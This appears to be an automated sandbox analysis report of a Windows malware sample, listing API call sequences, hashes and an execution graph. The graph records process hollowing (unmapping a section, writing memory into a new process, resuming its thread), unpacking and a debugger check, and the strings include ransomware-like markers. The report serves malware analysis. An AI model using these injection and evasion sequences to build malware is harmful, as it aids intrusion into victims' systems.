                • ___addlocaleref.LIBCMT ref: 00425A43
                • __lock.LIBCMT ref: 00425A57
                  • Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208
                Memory Dump Source
                • Source File: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.1252295528.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.1252295528.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: __getptd_noexit__lock$___addlocaleref__amsg_exit__calloc_crt__calloc_impl
                • String ID:
                • API String ID: 2580527540-0
                • Opcode ID: 3969c2aeef3154995e76024b80c076f82dc7aa98e25c938a71a0b2bc9f16ca02
                • Instruction ID: 8e8bf19fb99f986105457608807abe9f1de148b308aa0ea96eb71ffb67844566
                • Opcode Fuzzy Hash: 3969c2aeef3154995e76024b80c076f82dc7aa98e25c938a71a0b2bc9f16ca02
                • Instruction Fuzzy Hash: A3018471742720DBD720FFAAA443B1D77A09F40728F90424FF455972C6CE7C49418A6D
                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.1252295528.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.1252295528.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                • String ID:
                • API String ID: 3016257755-0
                • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                • Instruction ID: 47779ad8523d68e9f2e2bd7ddfa488ab055a33a4313e19cc57a45add4f9be60e
                • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                • Instruction Fuzzy Hash: B6014E7240014EBBDF125E85CC428EE3F62BB29354F58841AFE1968131C63AC9B2AB85
                APIs
                • lstrlenW.KERNEL32 ref: 004127B9
                • _malloc.LIBCMT ref: 004127C3
                  • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                  • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                  • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(005D0000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                • _memset.LIBCMT ref: 004127CE
                • WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,00000000,00000001,00000000,00000000), ref: 004127E4
                Memory Dump Source
                • Source File: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.1252295528.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.1252295528.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: AllocateByteCharHeapMultiWide_malloc_memsetlstrlen
                • String ID:
                • API String ID: 2824100046-0
                • Opcode ID: 09908775b5e5bc8df4309979956ae60541863bcf2bd73145411733e911d939f3
                • Instruction ID: 750470dcacb0e1f47d667e481962336cdcd22eeec5e51d764cc358051e51787a
                • Opcode Fuzzy Hash: 09908775b5e5bc8df4309979956ae60541863bcf2bd73145411733e911d939f3
                • Instruction Fuzzy Hash: C6F02735701214BBE72066669C8AFBB769DEB86764F100139F608E32C2E9512D0152F9
                APIs
                • lstrlenA.KERNEL32 ref: 00412806
                • _malloc.LIBCMT ref: 00412814
                  • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                  • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                  • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(005D0000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                • _memset.LIBCMT ref: 0041281F
                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000), ref: 00412832
                Memory Dump Source
                • Source File: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.1252295528.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.1252295528.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: AllocateByteCharHeapMultiWide_malloc_memsetlstrlen
                • String ID:
                • API String ID: 2824100046-0
                • Opcode ID: efacfe8a7822f511a106dcd20e6e7bf1a1e7fcbd7ce4ae236d875aaf3405b2f1
                • Instruction ID: a3b2a97d17252553cb1267f0baabe0c67c158e4fedc78561389223423b5350a8
                • Opcode Fuzzy Hash: efacfe8a7822f511a106dcd20e6e7bf1a1e7fcbd7ce4ae236d875aaf3405b2f1
                • Instruction Fuzzy Hash: 74E086767011347BE510235B7C8EFAB665CCBC27A5F50012AF615D22D38E941C0185B4
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.1252295528.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.1252295528.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: _memmove
                • String ID: invalid string position$string too long
                • API String ID: 4104443479-4289949731
                • Opcode ID: 6b6c026794a5df2e3fdb14e42bcdc4c864f1c14e00cdd800f0752a2c1f007913
                • Instruction ID: e15d95b7bc4e28eadeb147f52893af2b9f74cdff9e85ed34d7497a2036010d09
                • Opcode Fuzzy Hash: 6b6c026794a5df2e3fdb14e42bcdc4c864f1c14e00cdd800f0752a2c1f007913
                • Instruction Fuzzy Hash: 86C15C70704209DBCB24CF58D9C09EAB3B6FFC5304720452EE8468B655DB35ED96CBA9
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.1252295528.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.1252295528.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: _memset
                • String ID: .\crypto\asn1\tasn_new.c
                • API String ID: 2102423945-2878120539
                • Opcode ID: 71e1991ce2e3632dc73bc3e3216da1e10f6e2bb0c3d1e289869c94216a61690f
                • Instruction ID: a01d7b69f66ede694d5e1501cc12839462a5262961aeb872149f1145b0afa5c3
                • Opcode Fuzzy Hash: 71e1991ce2e3632dc73bc3e3216da1e10f6e2bb0c3d1e289869c94216a61690f
                • Instruction Fuzzy Hash: 5D510971342341A7E7306EA6AC82FB77798DF41B64F04442BFA0CD5282EA9DEC44817A
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.1252295528.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.1252295528.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: _memmove
                • String ID: invalid string position$string too long
                • API String ID: 4104443479-4289949731
                • Opcode ID: 964545c748993364f79d16a0f131f75f7c6f97d2359d890db139b78c498e4dd2
                • Instruction ID: 388339a757d446dde0ac97e241c54aefb3b464f1a8010d5a2c21a1bfa385432d
                • Opcode Fuzzy Hash: 964545c748993364f79d16a0f131f75f7c6f97d2359d890db139b78c498e4dd2
                • Instruction Fuzzy Hash: AC517F317042099BCF24DF19D9808EAB7B6FF85304B20456FE8158B351DB39ED968BE9
                APIs
                • GetUserNameW.ADVAPI32(?,?), ref: 0041B1BA
                  • Part of subcall function 004111C0: CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000003,00000080,00000000,?,?,?), ref: 0041120F
                  • Part of subcall function 004111C0: GetFileSizeEx.KERNEL32(00000000,?), ref: 00411228
                  • Part of subcall function 004111C0: CloseHandle.KERNEL32(00000000), ref: 0041123D
                  • Part of subcall function 004111C0: MoveFileW.KERNEL32(?,?), ref: 00411277
                  • Part of subcall function 0041BA10: LoadCursorW.USER32(00000000,00007F00), ref: 0041BA4A
                  • Part of subcall function 0041BA10: RegisterClassExW.USER32(00000030), ref: 0041BA73
                  • Part of subcall function 0041BA80: CreateWindowExW.USER32(00000000,LPCWSTRszWindowClass,LPCWSTRszTitle,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,?,00000000), ref: 0041BAAD
                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0041B4B3
                • TranslateMessage.USER32(?), ref: 0041B4CD
                • DispatchMessageW.USER32(?), ref: 0041B4D7
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.1252295528.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.1252295528.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: FileMessage$Create$ClassCloseCursorDispatchHandleLoadMoveNameRegisterSizeTranslateUserWindow
                • String ID: %username%$I:\5d2860c89d774.jpg
                • API String ID: 441990211-897913220
                • Opcode ID: 57ecfa34f23d78a1e26d0b496c5de0e3008a9e2e419c5c8680807d27605a0cc3
                • Instruction ID: 53fb4cb99f7e95a824910e08ad4bb0dd21933b0d591bc71827c80b4e91f39c04
                • Opcode Fuzzy Hash: 57ecfa34f23d78a1e26d0b496c5de0e3008a9e2e419c5c8680807d27605a0cc3
                • Instruction Fuzzy Hash: 015188715142449BC718FF61CC929EFB7A8BF54348F40482EF446431A2EF78AA9DCB96
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.1252295528.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.1252295528.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID: .\crypto\err\err.c$unknown
                • API String ID: 0-565200744
                • Opcode ID: 9dae3d662d88e5d53485dd14566563c9255a5f0e4e3b7cf97cf97a7a2e17faf8
                • Instruction ID: d1206a4052711c5ef0d05e5a1f97d3c0da723a5ab1c334b9285c6dd525f2274c
                • Opcode Fuzzy Hash: 9dae3d662d88e5d53485dd14566563c9255a5f0e4e3b7cf97cf97a7a2e17faf8
                • Instruction Fuzzy Hash: 72117C69F8070067F6202B166C87F562A819764B5AF55042FFA482D3C3E2FE54D8829E
                APIs
                • _memset.LIBCMT ref: 0042419D
                • IsDebuggerPresent.KERNEL32(?,?,00000001), ref: 00424252
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.1252295528.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.1252295528.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: DebuggerPresent_memset
                • String ID: i;B
                • API String ID: 2328436684-472376889
                • Opcode ID: 0bc333208f10a2510305f30f60194ffc8a1e9bc236dda87ca461c0d5e10d6844
                • Instruction ID: b2deef9000060817df5d9888a0c5d5c31052404ed3c7d79a7a675bf972ea9145
                • Opcode Fuzzy Hash: 0bc333208f10a2510305f30f60194ffc8a1e9bc236dda87ca461c0d5e10d6844
                • Instruction Fuzzy Hash: 3231D57591122C9BCB21DF69D9887C9B7B8FF08310F5042EAE80CA6251EB349F858F59
                APIs
                • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0042AB93
                • ___raise_securityfailure.LIBCMT ref: 0042AC7A
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.1252295528.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.1252295528.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: FeaturePresentProcessor___raise_securityfailure
                • String ID: 8Q
                • API String ID: 3761405300-2096853525
                • Opcode ID: eccf15afe34b7bdc1ccbb155ef79912499653c52d5481e078dd775b5985af611
                • Instruction ID: cc78ca7643d31f84c049b3cf87471233b0d3094e131d8c276326ba2ae67c1d9c
                • Opcode Fuzzy Hash: eccf15afe34b7bdc1ccbb155ef79912499653c52d5481e078dd775b5985af611
                • Instruction Fuzzy Hash: 4F21FFB5500304DBD750DF56F981A843BE9BB68310F10AA1AE908CB7E0D7F559D8EF45
                APIs
                • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00413CA0
                  • Part of subcall function 00423B4C: _malloc.LIBCMT ref: 00423B64
                • _memset.LIBCMT ref: 00413C83
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.1252295528.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.1252295528.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc_memset
                • String ID: vector<T> too long
                • API String ID: 1327501947-3788999226
                • Opcode ID: 13dbab4e4c979af06a9cf2652985864a633ab205e3cc78c94b6fadd0ced0ada8
                • Instruction ID: e8ff6f7d1438dbc4cc0d31425bbcf17e71e6c586c3cd126e38002517ea96b8c1
                • Opcode Fuzzy Hash: 13dbab4e4c979af06a9cf2652985864a633ab205e3cc78c94b6fadd0ced0ada8
                • Instruction Fuzzy Hash: AB0192B25003105BE3309F1AE801797B7E8AF40765F14842EE99993781F7B9E984C7D9
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.1252295528.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.1252295528.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: _fputws$CreateDirectory
                • String ID: C:\SystemID$C:\SystemID\PersonalID.txt
                • API String ID: 2590308727-54166481
                • Opcode ID: b861cdce013af4209bc30e04672f112ccf944bab98ef41955443f7e5140c860b
                • Instruction ID: 548e7949761e073c688dfdb6472f733b12cf2ebad02737ba307de427565b7e5f
                • Opcode Fuzzy Hash: b861cdce013af4209bc30e04672f112ccf944bab98ef41955443f7e5140c860b
                • Instruction Fuzzy Hash: 9911E672A00315EBCF20DF65DC8579A77A0AF10318F10063BED5962291E37A99588BCA
                APIs
                Strings
                • Assertion failed: %s, file %s, line %d, xrefs: 00420E13
                Memory Dump Source
                • Source File: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.1252295528.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.1252295528.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: __calloc_crt
                • String ID: Assertion failed: %s, file %s, line %d
                • API String ID: 3494438863-969893948
                • Opcode ID: 561489f2e4af6d624f58dbcfcda68910edfdae4a72d1be81448c26c2074ac95f
                • Instruction ID: 3c5265aa1bf4e9f5ad4874ec33d215fa8746995624eee7e22a7137551c8458fa
                • Opcode Fuzzy Hash: 561489f2e4af6d624f58dbcfcda68910edfdae4a72d1be81448c26c2074ac95f
                • Instruction Fuzzy Hash: 75F0A97130A2218BE734DB75BC51B6A27D5AF22724B51082FF100DA5C2E73C88425699
                APIs
                • _memset.LIBCMT ref: 00480686
                  • Part of subcall function 00454C00: _raise.LIBCMT ref: 00454C18
                Strings
                • .\crypto\evp\digest.c, xrefs: 00480638
                • ctx->digest->md_size <= EVP_MAX_MD_SIZE, xrefs: 0048062E
                Memory Dump Source
                • Source File: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.1252295528.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.1252295528.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: _memset_raise
                • String ID: .\crypto\evp\digest.c$ctx->digest->md_size <= EVP_MAX_MD_SIZE
                • API String ID: 1484197835-3867593797
                • Opcode ID: 332f563a29a4ae085e93c3cfda2a52d89a6f4a051d037047c0cfd39b7a6a7ebb
                • Instruction ID: 96aa535d5fc7c596ca855a62b55a20e08de4f59c43588781e3518ec4b5147bd0
                • Opcode Fuzzy Hash: 332f563a29a4ae085e93c3cfda2a52d89a6f4a051d037047c0cfd39b7a6a7ebb
                • Instruction Fuzzy Hash: 82012C756002109FC311EF09EC42E5AB7E5AFC8304F15446AF6889B352E765EC558B99
                APIs
                • std::exception::exception.LIBCMT ref: 0044F251
                  • Part of subcall function 00430CFC: std::exception::_Copy_str.LIBCMT ref: 00430D15
                • __CxxThrowException@8.LIBCMT ref: 0044F266
                  • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.1252295528.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.1252295528.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: Copy_strExceptionException@8RaiseThrowstd::exception::_std::exception::exception
                • String ID: TeM
                • API String ID: 757275642-2215902641
                • Opcode ID: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                • Instruction ID: d1ee5d24d6598838e25116ba354c7cf631fb5eda6106ebacc41b25e9fbee45cd
                • Opcode Fuzzy Hash: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                • Instruction Fuzzy Hash: 8FD06774D0020DBBCB04EFA5D59ACCDBBB8AA04348F009567AD1597241EA78A7498B99

                Execution Graph

                Execution Coverage:1.4%
                Dynamic/Decrypted Code Coverage:94.2%
                Signature Coverage:0%
                Total number of Nodes:137
                Total number of Limit Nodes:21
                execution_graph 38175 233f000 38178 233f026 38175->38178 38179 233f035 38178->38179 38182 233f7c6 38179->38182 38187 233f7e1 38182->38187 38183 233f7ea CreateToolhelp32Snapshot 38184 233f806 Module32First 38183->38184 38183->38187 38185 233f815 38184->38185 38186 233f025 38184->38186 38189 233f485 38185->38189 38187->38183 38187->38184 38190 233f4b0 38189->38190 38191 233f4c1 VirtualAlloc 38190->38191 38192 233f4f9 38190->38192 38191->38192 38192->38192 38193 404c3d 38240 406fc0 38193->38240 38195 404c49 GetStartupInfoW 38196 404c5d HeapSetInformation 38195->38196 38198 404c68 38195->38198 38196->38198 38241 40636a HeapCreate 38198->38241 38199 404cb6 38200 404cc1 38199->38200 38267 404c14 66 API calls 3 library calls 38199->38267 38268 405aca 86 API calls 4 library calls 38200->38268 38203 404cc7 38204 404cd3 __RTC_Initialize 38203->38204 38205 404ccb 38203->38205 38242 4076c7 73 API calls __calloc_crt 38204->38242 38269 404c14 66 API calls 3 library calls 38205->38269 38207 404cd2 38207->38204 38209 404ce0 38210 404ce4 38209->38210 38211 404cec GetCommandLineW 38209->38211 38270 404bf6 66 API calls 3 library calls 38210->38270 38243 40766f 68 API calls __malloc_crt 38211->38243 38215 404cfc 38271 4075c1 67 API calls 2 library calls 38215->38271 38217 404d06 38218 404d12 38217->38218 38219 404d0a 38217->38219 38244 40738f 66 API calls 5 library calls 38218->38244 38272 404bf6 66 API calls 3 library calls 38219->38272 38223 404d17 38224 404d23 38223->38224 38225 404d1b 38223->38225 38245 4049d5 77 API calls 4 library calls 38224->38245 38273 404bf6 66 API calls 3 library calls 38225->38273 38229 404d2a 38230 404d2f 38229->38230 38233 404d36 __wwincmdln 38229->38233 38274 404bf6 66 API calls 3 library calls 38230->38274 38232 404d35 38232->38233 38233->38232 38246 403bf0 38233->38246 38236 404d65 38276 404bd8 66 API calls _doexit 38236->38276 38239 404d6a __freefls@4 38240->38195 38241->38199 38242->38209 38243->38215 38244->38223 38245->38229 38248 4042a8 38246->38248 38247 4042b0 GetConsoleDisplayMode GetSysColor 38247->38248 38248->38247 38249 4042c9 38248->38249 38250 4042d9 GetCalendarInfoA LocalShrink QueryDosDeviceW DrawStateA 38249->38250 38251 40435a 38249->38251 38306 404777 66 API calls 4 library calls 38250->38306 38254 404378 GetCaretPos 38251->38254 38255 40437c SetEndOfFile GetTickCount 38251->38255 38257 404393 38251->38257 38253 40432b 38307 4046fd 66 API calls 2 library calls 38253->38307 38254->38255 38255->38251 38255->38257 38277 403900 38257->38277 38258 404335 38308 404737 66 API calls 2 library calls 38258->38308 38260 4043a4 38263 4043bc GetCurrentDirectoryW 38260->38263 38265 4043cb 38260->38265 38262 404341 38309 4045e0 68 API calls 4 library calls 38262->38309 38263->38260 38265->38236 38275 404bac 66 API calls _doexit 38265->38275 38266 404355 38266->38251 38267->38200 38268->38203 38269->38207 38271->38217 38275->38236 38276->38239 38280 40390d 38277->38280 38278 40391e SetLastError GetCurrentProcess 38279 403930 GetCharWidthFloatA GetBitmapBits GetCharWidth32A 38278->38279 38278->38280 38279->38280 38280->38278 38281 403965 38280->38281 38282 403a04 GlobalAlloc VirtualProtect 38281->38282 38283 403975 6 API calls 38281->38283 38285 403a50 LoadMenuW CharUpperW GetTickCount 38282->38285 38284 4039d5 38283->38284 38318 404581 66 API calls _free 38284->38318 38285->38285 38286 403a63 38285->38286 38288 403ad4 38286->38288 38290 403a99 GetDiskFreeSpaceExA SetConsoleCP LoadLibraryW PeekConsoleInputA WaitForDebugEvent 38286->38290 38292 403af2 LCMapStringW SetEnvironmentVariableW OpenEventA 38288->38292 38294 403b23 38288->38294 38289 4039dd 38319 404908 79 API calls __wcstoi64 38289->38319 38290->38286 38292->38288 38293 4039e4 38320 40454c 77 API calls __mbstrnlen_l 38293->38320 38310 4035e0 38294->38310 38296 403b28 38298 403b30 SetLastError 38296->38298 38301 403b58 38296->38301 38298->38296 38299 4039fa 38321 404bac 66 API calls _doexit 38299->38321 38302 403b7d 6 API calls 38301->38302 38303 403bc3 InterlockedCompareExchange 38301->38303 38304 403bd6 LoadLibraryA 38301->38304 38302->38301 38303->38301 38305 403be7 38304->38305 38305->38260 38306->38253 38307->38258 38308->38262 38309->38266 38314 4035ea _memset 38310->38314 38311 4038e9 38311->38296 38312 403642 11 API calls 38312->38314 38313 40378f 8 API calls 38313->38314 38314->38311 38314->38312 38314->38313 38315 403852 ReadConsoleInputW SetVolumeMountPointA 38314->38315 38316 40380a CommConfigDialogW CreateActCtxA EnumCalendarInfoExA GetLocaleInfoA 38314->38316 38317 403892 GetConsoleAliasExesLengthW CreateEventW 38314->38317 38315->38314 38316->38314 38317->38314 38318->38289 38319->38293 38320->38299 38321->38282 38322 23e0000 38325 23e0630 38322->38325 38324 23e0005 38326 23e064c 38325->38326 38328 23e1577 38326->38328 38331 23e05b0 38328->38331 38334 23e05dc 38331->38334 38332 23e061e 38333 23e05e2 GetFileAttributesA 38333->38334 38334->38332 38334->38333 38336 23e0420 38334->38336 38337 23e04f3 38336->38337 38338 23e04ff CreateWindowExA 38337->38338 38339 23e04fa 38337->38339 38338->38339 38340 23e0540 PostMessageA 38338->38340 38339->38334 38341 23e055f 38340->38341 38341->38339 38343 23e0110 VirtualAlloc GetModuleFileNameA 38341->38343 38344 23e017d CreateProcessA 38343->38344 38345 23e0414 38343->38345 38344->38345 38347 23e025f VirtualFree VirtualAlloc Wow64GetThreadContext 38344->38347 38345->38341 38347->38345 38348 23e02a9 ReadProcessMemory 38347->38348 38349 23e02e5 VirtualAllocEx NtWriteVirtualMemory 38348->38349 38350 23e02d5 NtUnmapViewOfSection 38348->38350 38351 23e033b 38349->38351 38350->38349 38352 23e039d WriteProcessMemory Wow64SetThreadContext ResumeThread 38351->38352 38353 23e0350 NtWriteVirtualMemory 38351->38353 38354 23e03fb ExitProcess 38352->38354 38353->38351

                Control-flow Graph

                APIs
                • GetConsoleDisplayMode.KERNEL32(00000000,5A23B70C,4C792A3C,59A467F8,7471B480,3B5F2E36,48B33CD3,20083C10,7471B480,3BDF99AE,0ACBF23F,79236BC7,7BF5D87B,64F98D57,7B811E2C,609402EA), ref: 004042B2
                • GetSysColor.USER32(00000000), ref: 004042B6
                • GetCalendarInfoA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 004042E5
                • LocalShrink.KERNEL32(00000000,00000000), ref: 004042EF
                • QueryDosDeviceW.KERNEL32(wiheli dekehec tuwovinec xipasuvilugafodozuyo,?,00000000), ref: 00404304
                • DrawStateA.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040431E
                • _malloc.LIBCMT ref: 00404326
                • _free.LIBCMT ref: 00404330
                • _calloc.LIBCMT ref: 0040433C
                • __floor_pentium4.LIBCMT ref: 00404350
                • GetCaretPos.USER32(00000000,5A23B70C,4C792A3C,59A467F8,7471B480,3B5F2E36,48B33CD3,20083C10,7471B480,3BDF99AE,0ACBF23F,79236BC7,7BF5D87B,64F98D57,7B811E2C,609402EA), ref: 0040437A
                • SetEndOfFile.KERNEL32(00000000,5A23B70C,4C792A3C,59A467F8,7471B480,3B5F2E36,48B33CD3,20083C10,7471B480,3BDF99AE,0ACBF23F,79236BC7,7BF5D87B,64F98D57,7B811E2C,609402EA), ref: 0040437E
                • GetTickCount.KERNEL32 ref: 00404380
                • GetCurrentDirectoryW.KERNEL32(00000000,?), ref: 004043C6
                Strings
                Memory Dump Source
                • Source File: 00000005.00000002.1259611506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000005.00000002.1259559481.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000005.00000002.1259611506.0000000000410000.00000020.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000005.00000002.1260066044.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000005.00000002.1260150008.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000005.00000002.1260456772.000000000064A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_400000_66d5df681876c_file010924.jbxd
                Similarity
                • API ID: CalendarCaretColorConsoleCountCurrentDeviceDirectoryDisplayDrawFileInfoLocalModeQueryShrinkStateTick__floor_pentium4_calloc_free_malloc
                • String ID: ,Sf$6._;$:6Y2$; =Z$<*yL$@9L/$CS?$L+U5$augY$hr_3$jJ,S$s.Y*$wiheli dekehec tuwovinec xipasuvilugafodozuyo$|6A($Hk<
                • API String ID: 924734774-1285194791
                • Opcode ID: 3360a2277858194782dde3c7c085f57b235e4587718fe2da1788c104c9dc8348
                • Instruction ID: 3863aa5b02f7fd0275f4c771cf35735ce8351af34a87748ea64ca48beac1dbbf
